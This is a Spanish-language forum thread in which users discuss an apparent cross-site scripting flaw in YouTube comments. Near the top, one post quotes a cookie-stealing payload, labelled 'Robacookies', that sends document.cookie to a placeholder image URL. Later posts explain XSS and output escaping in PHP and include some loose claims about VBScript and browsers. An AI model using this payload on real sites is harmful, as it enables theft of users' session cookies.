Ya no funciona, o eso parece xD
<script>document.write("<img src='PHP DYNAMIC IMAGE HERE"+ document.cookie+"'>')</script>
Robacookies
Parece que lo han arreglado
edit: http://www.youtube.com/watch?v=wutmEjdbedE Quitar el modo seguridad de abajo xdd
Es posible que se pueda hacer Cross Site Scripting ()que es una taque) y os sorprenderia la cantidad de paginas con aplicaciones que lo permiten por mala gestion de esta.
Asi es como colaron la cara de Mr Bean donde ZP en las europeas XD
La idea es facil:
- Cuando se programa, en aquellos puntos en los que los usuarios puedan interactuar añadiendo contenido, se intenta que el contenido que se almacene, esté limpio, tal cual se introduce, pero a la hora de mostrarlo se controle para evitar justamente esto.
En PHP, todos los comentarios, posts, etc... deben controlarse con un htmlspecialchars() o con un htmlentities() o con un homólogo personalizado.
Si no se hace esto, se puede hacer lo que se conoce como XSS. - El XSS, permite que cualquier porcion, por ejemplo de codigo HTML, se ejecute en tiempo de renderizado, por así decirlo, haciendo que un comentario que contenga HTML nativo, se interprete por el explorador como tal. Por eso, en MV por ejemplo, no podemos usar tags HTML estándard, como el <b>, y por eso existe el BBCode, que es una serie controlada de tags para cambiar en tiempo real por los de HTML, permitiéndonos a los programadores, decidir que funciones "se habilitaran".
- De todos los "tags", uno de los peores para el XSS, es el <script>.
Dicho tag, puede usarse para ejecutar todo un conjunto de SL diferentes (scripting-languages) pero el jefe por excelencia, es el Javascript. - Los scripts, se conocen como lenguages "Cliente", es decir, que se ejecutan en la máquina del usuario, y no en el servidor remoto. PHP, JSP, etc... por ejemplo, son lenguajes "Servidor", ya que se ejecutan solamente en el Servidor que aloja la web, y todo lo que allí sucede, se devuelve en forma de respuesta/contestación al usuario.
- Si alguien pone un comentario "malévolo" aprovechandose del XSS, al servidor de youtube, no le pasará nada de nada. Así que no es un hackeo hacia ellos, sinó hacia todos los demas usuarios, ya que la porción de codigo que se haya metido en un comentario, se nos ejecutará a todos los otros.
- Javascript, por ejemplo, por temas de seguridad, ya hace muchisimo tiempo que vetó la posibilidad de crear ficheros en la maquina de un usuario. Y en principio del mismo modo, de eliminarlos. Así que si el problema de deletes y otros está sucediendo, probablemente no es por que se esté usando Javascript, sino ACTIVEX o sucedáneos como VBScript. De ahí a que solo Explorer de problemas en ese sentido y Chrome, por querer "abarcarlo" todo.
Me parece increíble que una novatada como esa, les haya sucedído a la gente de Google. Es impresionante y a su vez, tranqulizante, ya que hasta los mas grandes la cagan de la forma mas increíble posible.
Un brindis por los de Google, y para el plantel de programadores de Youtube. La comunidad de programadores de la Matrix, estámos con vosotros! 
edit:
Efectivamente, según wikipedia:
...
Cuando se emplea en Internet Explorer, VBScript funciona de forma muy similar a JavaScript, procesando código contenido en el documento HTML. VBScript también puede usarse para crear aplicaciones HTML independientes (extensión .hta), que necesitan Internet Explorer 5.0 o superior para poder ser ejecutados. Los desarrolladores de aplicaciones en web suelen preferir JavaScript debido a su mayor compatibilidad con otros navegadores de Internet, ya que VBScript sólo está disponible para el navegador de Microsoft Internet Explorer, Google Chrome y no en otros como Firefox u Opera.
...
http://es.wikipedia.org/wiki/VBScript
Ya sabemos por donde están yendo... Ya son HDP, ya...
/\
|
|
|
|__ Cada cual más tonto
La verdad cuesta creer que una página como Youtube tubiera un error así ... no quiero imaginarme el resto de webs xd
